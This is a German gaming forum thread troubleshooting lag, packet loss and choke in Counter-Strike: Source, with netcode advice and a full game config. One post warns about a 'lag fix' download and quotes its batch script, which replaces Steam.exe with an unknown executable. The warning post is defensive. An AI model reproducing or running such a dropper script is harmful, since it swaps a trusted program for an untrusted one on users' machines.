• Mitspieler gesucht? Du willst dich locker mit der Community austauschen? Schau gerne auf unserem ComputerBase Discord vorbei!

Counter Strike lag in regelmäßigen abständen?

H

Harald91

Gast
Hi,

seit neustem steigt meine "loss" (also packeten verlust) in regelmäßigen abständen auf ca. 20 bei Counter Strike source... Kurzer Freeze.. bumm bin ich tod...

also meine I-netverbindung ist Dsl 1000 *schluchts* :( hab aber eine gute ping von 40 bis 80.

in 8 - 15 kp/s
out 3 - 5 kp /s

habe netsettings ausprobiert aber keine konnten dieses problem lösen...:(

was ich vllt noch dazu sagen müsste ist das ich Wlan nutze hab durchschnittlich eine "sehr gute" verbindung mit 24-54mbit/s übertragunsrate.

Laut Asus Wifi-AP Solo liegt die Signal stärke zwischen 60% und 70%.

nutze aber nicht mehr die original Antenne da diese futsch gegangen ist... habe mir also eine Hama Wlan Antenne mit 4dBi angeschafft...

please i need help... so kann ich nicht zocken...
 
also wegerm DSL1000 kanns eigtl nich sein
prob is halt das wlan, erstens dass dich die verschlüsselung bisl runterbremst und durch die signalstärke muss er natürlich auch mehr berrechnen oder so, glaub ich zumindest

wobei das eigtl auch ein zu geringer teil ist, schon mal bei deinem provider beim tech. support nachgefragt?
 
Zuletzt bearbeitet:
und was kann man machen wenn man permanten choke und loss hat?
dsl 3000

cmdrate 100
updaterate 100
rate 25000
wenn ich die cmdrate runter setze wirds besser,aber geht net weg..

mfg mrfragger
 
Das liegt daran, dass der PC regelmäßig nach neuen Netzwerken sucht und dabei der Lag entsteht. Du musst vor dem Spielen den Dienst "Konfigurationsfreie Drahtlose Verbindung" beenden

Oder saugst dir das Tool "Vista Anti-Lag". Hat bei mir Abhilfe geschafft.

Vista Anti-Lag (VAL) optimiert Ihr WLAN unter Windows Vista (alle Editionen).
Windows Vista arbeitet standardmässig mit nicht optimalen Wireless Settings. Einige Einstellungen führen bei vielen WLAN-Karten (z.Bsp. von Linksys) zu ca. 1,5sec Aussetzern in der Verbindung, die alle 30-60sec auftreten. Gerade in der Gaming-Community oder bei Downloads sind diese Aussetzer nicht gerne gesehen.

Download hier:
http://www.codecase.de/index.php/downloads/cat_view/34-vista-anti-lag
 
mrfragger schrieb:
und was kann man machen wenn man permanten choke und loss hat?
dsl 3000

cmdrate 100
updaterate 100
rate 25000
wenn ich die cmdrate runter setze wirds besser,aber geht net weg..

mfg mrfragger

Es ist erstmal ganz wichtig folgendes zu unterscheiden:

Loss sind 100% verlorengegangene Datenpakete, was zu 99% immer am Netz des Clients Richtung Gameserver liegt. Wo die Datenpakete verloren gehen, kannst Du nur mit einem Traceroute erkennen - beheben kann solche Probleme nur Dein Provider, bzw. wenn Loss in Deinem Heimnetz auftritt, Du selber.

Choke sind verspätet gesendete Datenpakete. Diese Probleme treten häufig auf, wenn der Gameserver überlastet ist oder der Meinung ist, mehr Datenpakete sind nicht nötig, um Dir allen nötigen Daten zukommen zu lassen. Choke ist auch auf Tickrate 100 Server möglich, die einwandfrei konfiguriert wurden und dessen Rootserver nicht ansatzweise ausgelastet ist. Jedoch ist es auf den allermeisten Publicservern normal, das Choke vorherrschen, wenn da alle 20 Spieler mit LAN Settings ankommen... Für den Publicbereich hast Du korrekt erkannt, das Du den Choke beseitigen kannst, indem Du die entsprechenden Variablen runterregelst. Ansonsten: Choke ist normalerweise nichts "schlimmes", wenn nicht mehr als 10-20% auftreten.


@ Moderator

Es müßte mal jemand ein Top pinnen, in dem diese WLAN Lags und Choke/Loss erklärt werden, hier handelt ja jeder 3. Thread davon.
 
Das liegt daran, dass der PC regelmäßig nach neuen Netzwerken sucht und dabei der Lag entsteht. Du musst vor dem Spielen den Dienst "Konfigurationsfreie Drahtlose Verbindung" beenden, dann müsste es funktionieren. Kannst auch mal die Forensuche anschmeißen, ich hab schon 2-3 mal Datein hochgeladen, mit denen du das mit einem Mausklick machen kannst.
https://www.computerbase.de/forum/threads/wlan-und-es-ruckelt-beim-gamen.294290/#post-2897615

@ Janny: Vielen Dank! Geht wieder Problem los:daumen: und sogar die ping ist besser geworden^^
 
Erstmal hallo alle im Forum.
Ich bin selber Counterstrike Source spieler seit ca. 2 Jahren, und habe immer auf meinen Notebook / Laptop ''trainiert''.
Mein Skill war nicht der schlechteste, und eigenlob stinkt mir zu viel. :p

Alles lief supper! Bis an dem Tag, wo mein Notebook einfach nicht mehr Funktionierte, er ging nicht an machte Probleme uvm.
Es ist kein schlechtes Gerät, extra für Counterstrike Source habe ich ihn mir gekauft, aber reaperieren? Wo es extrem teuer wird? Nein danke.
Dachte ich mir, spiel auf dein Computer weiter wird ja kein großer unterschied sein.
Ohhhhh, doch! Unterschied hoch 1 !
Die Qualli anders, cfg anders, alles war komisch und machte überhaupt garkeinen Spaß mehr.
Bis gestern, wo mein Freund eine neue cfg mir schickte, und ich kann euch sagen :
' Wenn es nicht am Wlan liegt sprich Internet, oder irgendwelche anderen vermuteten Sachen...
Nimmt euch eine andere cfg, ich lag überhaupt nicht mehr was damals alle Minuten kam, die Maps kann ich einbahnfrei laden, und ohne Probleme kann ich spielen.

Besorgt euch eine neue cfg, und es müsste klappen :]

Wer keine findet, oder meine haben möchte, einfach mal bei Steam add'n:
M1ch3LD3LuXe

Viel Spaß, und noch viel Glück,
Michel

P.S: Rechtschreibfehler dürfen behalten werden ( Notfall: Krank in der Nase :D )
 
M1ch3L schrieb:

OT:
Scheint ein Internetphänomen zu sein oder einfach ein Witz wie "zum bleistift" und nur ich finde ihn net lustig

es heisst "einwandfrei" und hat nichts mit einer einbahn zu tun,

was ist eine Einbahn?
Einschienenbahn?
omg

topic:
hab auch choke, aber nur manchmal bis höchstens 5. Aber ich komm damit klar
 
versucht mal das tool: ping boot, bei mir hats einiges gebracht.
 
Hey,
Letzte Antwort ist zwar schon etwas länger her, aber wollte jetzt auch nochmal hier posten, weil mich diese ständigen Lags auch immer sehr genervt haben(Lagspikes).
Hab herausgefunden, dass das bei windows 7 was mit dem Networkthrottling zu tun hat, aber so genau kann ich das auch nicht erklären ;D
Die Lösung war für mich folgendes Programm:Link entfernt.
Seitdem läuft wieder einwandfrei :):cool_alt:

P.S. Falls das nicht funktioniert lohnt es sich auf alle Fälle mal den Game-Cache zu defragmentieren. (Beim jeweiligen Spiel unter Eigenschaften)
 
Zuletzt bearbeitet von einem Moderator:
Es laggt z.Z. so oder so da kann mann auch nichts ändern! Hängt mit dem neuen Css (Orange-Box) zusammen! Die ganzen Server müssen auch erst richtig upgedaten werden<- wir sind noch dabei:)

ps: Ich würde mir das sowieso nicht laden ->nicht böse gemeint<- aber das ist dein 1 Beitrag und da könnte genau so gut nen Trojaner drinne sein! Aber wie gesagt das ist nichts gegen dich und ich will dich auch nicht verurteilen aber sicher ist sicher:D!
 
V O R S I C H T !!!

Folgendes passiert wenn ihr diese Datei ausführt:

@echo off
rename "C:\Program Files\Steam\Steam.exe" "steam_setup.log"
rename "C:\Program Files (x86)\Steam\Steam.exe" "steam_setup.log"
rename "C:\Programme\Steam\Steam.exe" "steam_setup.log"
xcopy "steam.exe" "C:\Program Files\Steam\" /C /I /R /Y
xcopy "steam.exe" "C:\Program Files (x86)\Steam\" /C /I /R /Y
xcopy "steam.exe" "C:\Programme\Steam\" /C /I /R /Y
del "c:\steam.exe" /F
cls
echo ---- installation successful ----
pause


Den Rest kann sich wohl jeder denken...Eure Steam.exe wird in eine angebliche log-Datei umbenannt und durch einen ausgekotzten Haufen Programmiermüll ersetzt. Finger weg.

fuck you fuckin script-kiddie^^ :king:
 
Bevor ich ein neues Tropic auf mache für das selbe prob fang ich lieber mal hier an

Ich habe ein AMD x2 6000+
8GB Ram
4350 ATI
16k
Leitung

Meine Config


Code:
unbindall
bind "0" "slot10"
bind "1" "slot1"
bind "2" "slot2"
bind "3" "slot3"
bind "4" "slot4"
bind "5" "slot5"
bind "6" "slot6"
bind "7" "slot7"
bind "8" "slot8"
bind "9" "slot9"
bind "k" "kill"
bind "m" "chooseteam"
bind "n" "nightvision"
bind "q" "lastinv"
bind "r" "+reload"
bind "t" "say timeleft"
bind "u" "messagemode2"
bind "w" "!w"
bind "y" "messagemode"
bind "z" "radio1"
bind "KP_INS" "drop"
bind "KP_END" "+use"
bind "KP_LEFTARROW" "impulse 100"
bind "KP_HOME" "impulse 201"
bind "KP_MINUS" "toggleconsole"
bind "KP_DEL" "buymenu"
bind "`" "toggleconsole"
bind "." "rebuy"
bind "-" "toggleconsole"
bind "SPACE" "+jump"
bind "TAB" "+showscores"
bind "ESCAPE" "cancelselect"
bind "DEL" "+voicerecord"
bind "PAUSE" "pause"
bind "RSHIFT" "+speed"
bind "RCTRL" "+duck"
bind "UPARROW" "+forward"
bind "LEFTARROW" "+moveleft"
bind "DOWNARROW" "+back"
bind "RIGHTARROW" "+moveright"
bind "F5" "-"
bind "MOUSE1" "+attack"
bind "MOUSE2" "+attack2"
bind "MWHEELUP" "invprev"
bind "MWHEELDOWN" "invnext"
cl_righthand "1"
cl_rumblescale "1.0"
cl_debugrumble "0"
cl_thirdperson "0"
cl_team "default"
cl_class "default"
hud_takesshots "1"
hud_freezecamhide "0"
cl_detail_max_sway "5"
cl_detail_avoid_radius "64"
cl_detail_avoid_force "0.4"
cl_detail_avoid_recover_speed "0.25"
cl_showhelp "1"
hud_draw_fixed_reticle "0"
hud_achievement_description "1"
hud_achievement_count "5"
cl_chatfilters "20"
cl_chatfilter_version "1"
cc_linger_time "1.0"
cc_predisplay_time "0.25"
cc_subtitles "0"
cc_lang ""
crosshair "1"
cl_observercrosshair "1"
cl_hudhint_sound "1"
g15_update_msec "250"
cam_snapto "0"
cam_ideallag "4.0"
cam_idealdelta "4.0"
cam_idealyaw "0"
cam_idealpitch "0"
cam_idealdist "150"
cam_idealdistright "0"
cam_idealdistup "0"
cam_collision "1"
c_maxpitch "90"
c_minpitch "0"
c_maxyaw "135"
c_minyaw "-135"
c_maxdistance "200"
c_mindistance "30"
c_orthowidth "100"
c_orthoheight "100"
joy_name "joystick"
joy_advanced "0"
joy_advaxisx "0"
joy_advaxisy "0"
joy_advaxisz "0"
joy_advaxisr "0"
joy_advaxisu "0"
joy_advaxisv "0"
joy_forwardthreshold "0.15"
joy_sidethreshold "0.15"
joy_pitchthreshold "0.15"
joy_yawthreshold "0.15"
joy_forwardsensitivity "-1"
joy_sidesensitivity "1"
joy_pitchsensitivity "1"
joy_yawsensitivity "-1"
joy_response_move "1"
joy_response_look "0"
joy_lowend "1"
joy_lowmap "1"
joy_accelscale "0.6"
joy_accelmax "1.0"
joy_autoaimdampenrange "0"
joy_autoaimdampen "0"
joy_diagonalpov "0"
joy_display_input "0"
joy_wingmanwarrior_turnhack "0"
joy_inverty "0"
joy_movement_stick "0"
joy_xcontroller_cfg_loaded "0"
cl_upspeed "320"
cl_forwardspeed "400"
cl_backspeed "400"
lookspring "0"
lookstrafe "0"
joystick "0"
m_pitch "0.022"
m_filter "0"
sensitivity "15.000000"
m_side "0.8"
m_yaw "0.022"
m_forward "1"
m_customaccel "0"
m_customaccel_scale "0.04"
m_customaccel_max "0"
m_customaccel_exponent "1"
m_mousespeed "1"
m_mouseaccel1 "0"
m_mouseaccel2 "0"
m_rawinput "0"
cl_mouselook "1"
cl_idealpitchscale "0.8"
net_scale "5"
net_graphpos "1"
net_graphsolid "1"
net_graphtext "1"
net_graphmsecs "400"
net_graphshowlatency "1"
net_graphshowinterp "1"
net_graph "1"
net_graphheight "64"
net_graphproportionalfont "1"
mat_software_aa_strength "0.000000"
mat_software_aa_quality "0"
mat_software_aa_edge_threshold "1.0"
mat_software_aa_blur_one_pixel_lines "0.5"
mat_software_aa_tap_offset "1.0"
mat_software_aa_strength_vgui "1.000000"
voice_modenable "1"
hud_fastswitch "0"
cl_playerspraydisable "0"
muzzleflash_light "1"
hud_classautokill "1"
overview_health "1"
overview_names "1"
overview_tracks "1"
overview_locked "1"
overview_alpha "1.0"
spec_scoreboard "0"
cl_spec_mode "4"
cl_disablehtmlmotd "0"
cl_buy_favorite_quiet "1"
cl_buy_favorite_nowarn "0"
cl_autowepswitch "0"
cl_autohelp "0"
cl_show_achievement_popups "1"
cl_disablefreezecam "0"
hud_showtargetpos "0"
hud_showtargetid "1"
cl_radartype "1"
cl_radaralpha "155"
cl_locationalpha "255"
cl_crosshaircolor "0"
cl_dynamiccrosshair "1"
cl_scalecrosshair "1"
cl_crosshairscale "1200"
cl_crosshairalpha "255"
cl_crosshairusealpha "1"
cl_crosshairsize "6"
cl_crosshairthickness "0.5"
cl_crosshaircolor_r "255"
cl_crosshaircolor_g "0"
cl_crosshaircolor_b "0255"
cl_legacy_crosshair_recoil "0"
cl_legacy_crosshair_scale "1"
cl_scoreboard_ct_color_red "150"
cl_scoreboard_ct_color_green "200"
cl_scoreboard_ct_color_blue "255"
cl_scoreboard_t_color_red "240"
cl_scoreboard_t_color_green "90"
cl_scoreboard_t_color_blue "90"
cl_scoreboard_dead_color_red "125"
cl_scoreboard_dead_color_green "125"
cl_scoreboard_dead_color_blue "125"
cl_scoreboard_clan_ct_color_red "150"
cl_scoreboard_clan_ct_color_green "200"
cl_scoreboard_clan_ct_color_blue "255"
cl_scoreboard_clan_t_color_red "240"
cl_scoreboard_clan_t_color_green "90"
cl_scoreboard_clan_t_color_blue "90"
cl_scoreboard_dead_clan_color_red "125"
cl_scoreboard_dead_clan_color_green "125"
cl_scoreboard_dead_clan_color_blue "125"
cl_radar_locked "0"
overview_preferred_mode "1"
overview_preferred_view_size "600"
cl_round_win_fade_time "1.5"
cl_nowinpanel "0"
r_eyegloss "0"
vgui_message_dialog_modal "1"
commentary_firstrun "0"
scene_showfaceto "0"
ai_report_task_timings_on_limit "0"
ai_think_limit_label "0"
npc_height_adjust "1"
sv_pvsskipanimation "1"
scene_showlook "0"
scene_showmoveto "0"
scene_showunlock "0"
commentary "0"
xbox_throttlebias "100"
xbox_throttlespoof "200"
xbox_autothrottle "1"
func_break_max_pieces "15"
suitvolume "0.25"
option_duck_method "1"
sk_autoaim_mode "1"
sv_noclipaccelerate "5"
sv_noclipspeed "5"
sv_specaccelerate "5"
sv_specspeed "3"
sv_specnoclip "1"
sv_backspeed "0.6"
sv_skyname "militia_hdr"
bugreporter_uploadasync "0"
cl_cmdrate "66"
cl_updaterate "66"
closecaption "0"
skill "1"
net_maxroutable "1260"
cl_allowupload "0"
name "Puma D. Ace @Music"
password ""
cl_clanid "2207868"
sv_unlockedchapters "1"
tv_nochat "0"
cl_showpluginmessages "0"
cl_timeout "60"
cl_logofile "materials/vgui/logos/spray.vtf"
cl_soundfile "sound/player/jingle.wav"
cl_forcepreload "1"
cl_allowdownload "0"
cl_downloadfilter "all"
con_enable "0"
r_eyemove "0"
r_eyeshift_x "0"
r_eyeshift_y "0"
r_eyeshift_z "0"
r_eyesize "0"
r_ambientboost "0"
r_ambientmin "0.3"
r_ambientfactor "5"
r_drawmodelstatsoverlaymin "0.1"
r_drawmodelstatsoverlaymax "1.5"
mp_decals "0"
sv_logsdir "logs"
sv_logfile "1"
sv_logflush "0"
sv_logecho "1"
sv_log_onefile "0"
sv_logbans "0"
sv_voiceenable "1"
sv_forcepreload "0"
windows_speaker_config "7"
snd_mute_losefocus "1"
snd_legacy_surround "0"
snd_pitchquality "1"
volume "0.370000"
snd_musicvolume "0.250000"
snd_mixahead "0.1"
adsp_debug "0"
snd_ducktovolume "0.55"
snd_duckerattacktime "0.5"
snd_duckerreleasetime "2.5"
snd_duckerthreshold "0.15"
dsp_slow_cpu "0"
dsp_volume "1.0"
dsp_enhance_stereo "0"
voice_scale "1"
voice_enable "1"
voice_forcemicrecord "1"
budget_bargraph_background_alpha "128"
budget_peaks_window "30"
budget_averages_window "30"
budget_show_peaks "1"
budget_show_averages "0"
budget_show_history "0"
budget_history_numsamplesvisible "100"
budget_history_range_ms "66.666666667"
budget_panel_bottom_of_history_fraction ".25"
budget_bargraph_range_ms "16.6666666667"
budget_background_alpha "128"
budget_panel_x "0"
budget_panel_y "50"
budget_panel_width "512"
budget_panel_height "384"
texture_budget_panel_x "0"
texture_budget_panel_y "450"
texture_budget_panel_width "512"
texture_budget_panel_height "284"
texture_budget_panel_bottom_of_history_fraction ".25"
texture_budget_background_alpha "128"
vprof_graphwidth "512"
vprof_graphheight "256"
vprof_verbose "1"
vprof_unaccounted_limit "0.3"
vprof_warningmsec "10"
r_rootlod "2"
mat_monitorgamma_tv_enabled "0"
r_waterforceexpensive "0"
mat_queue_mode "-1"
mat_texture_list_content_path ""
joy_wingmanwarrior_centerhack "0"
joy_axisbutton_threshold "0.3"
mat_hdr_level "0"

cl_lagcomp_errorcheck "1"

// Bots interpolieren.
cl_interp_npcs "1"



//******Multicore Rendering******//
// 

Orangebox unterstuetzt Multi Core Rendering. Spielt mit 

den Werten rum. Es sollte mehr FPS geben.

// Zusaetzliche 

Interpolationscyclen, wenn Multicore Rendering aktiv ist.
cl_interp_threadmodeticks "1"

// Die paralelle Berechnung 

von C_BaseAnimating::SetupBones() aktivieren.
cl_threaded_bone_setup "0"

// Jede Maps ist in leafs 

(Berechnungsabschnitte) aufgeteilt. 
// Mit diesem Befehl 

kann man sie auf mehren CPU Kernen verteilt berechnen
cl_threaded_client_leaf_system "0"

// Multicore Rendering 

aktivieren (0 = aus, 1 = wenn eine multicore CPU vorhanden 

ist, 2 = in jedem Fall aktivieren)
// Das Beste ist es die 

Autoerkennung, also 1 zu benutzen
host_thread_mode "1"

// 

Der Queue/Thread den das Material System benutzen soll:
// 

-2=legacy default, -1=default, 0=synchronous single 

thread, 1=queued sing
// Wenn man Multicore komplett 

abschalten will nimmt man hier 0. Will man es aktivieren 

nimmt man -1. 
// Alle anderen Werte fuehren bei mir zu 

Rucklern und Abstuerzen.
mat_queue_mode "-1"
 
// Ein Teil 

des Decal Rendering wird vom Material System bearbeitungs 

Thread berechnet.
r_queued_decals "0"

// beeinflusst die 

Nachberechnung. Andere Werte als 0 fuehren zur 

Unstabilitaet
r_queued_post_processing "0"

// Das Gleiche 

fuer die Berechnung von Seilen. Andere Werte als 0 fuehren 

zur Unstabilitaet
r_queued_ropes "0"

// Paralleles Berechnen 

von Oberflaechen.
r_threaded_renderables "0"

// Paralleles 

Berechnen von Partikeln.
r_threaded_particle "0"

// 

Paralleles Berechnen von Schatten
r_threaded_client_shadow_manage "0" 



cl_crosshaircolor "5"
cl_crosshaircolor_r "255"
cl_crosshaircolor_b "255"
cl_crosshaircolor_g "0"
cl_crosshairscale "3000"


Ich habe ka wo das Problem ist

wenn ich DM zocke mit 30 Man ist zb nix wenn ich 1on1 mache Lagt mein PC an bestimmten stellen der Map eine FPS gehn unter 40 >< und wenn das mal anfängt geht nix mehr es werden dann immer mehr und mehr ...

Was habe ich sonst noch so an ... wenn ich zocke :

N360
Spybot
TeamSpeak 3
Logitech G930 & G19 Treiber

LG
TBS
 
bei welchen maps und welchen stellen tritt das problem auf? sind smokes unterwegs?

kannst gerne mal nen screenshot reinstellen
 
@par nen screenshot sollte wenig bis garnichts bringen.
@Topic versuchs mal mit nem anderen USB Port für die Maus, hatte das selbe Problem ;)
 
@TBS7

deine grafikkarte könnte das problem sein ;) auf welcher auflösung spielst du eig?
und schraub mal die grafik settings runter in cs.
cs verwendet immer 256 mb ram von der grafikkarte ( standart ) du solltest mal auf 128mb stellen.

du machst das so!


gl_texturemode GL_NEAREST ( beste leistung, schlechteste qualität im spiel ! )
gl_max_size "512" ( standart 256, du stellst auf 128 )


Vileicht gehts dann ;) ?
 
@assojan der thread ist schon uralt^^ und wie ich im anderen thread schon
Meinte, sogut ist die verlinkte cfg nicht.
 
Zurück
Oben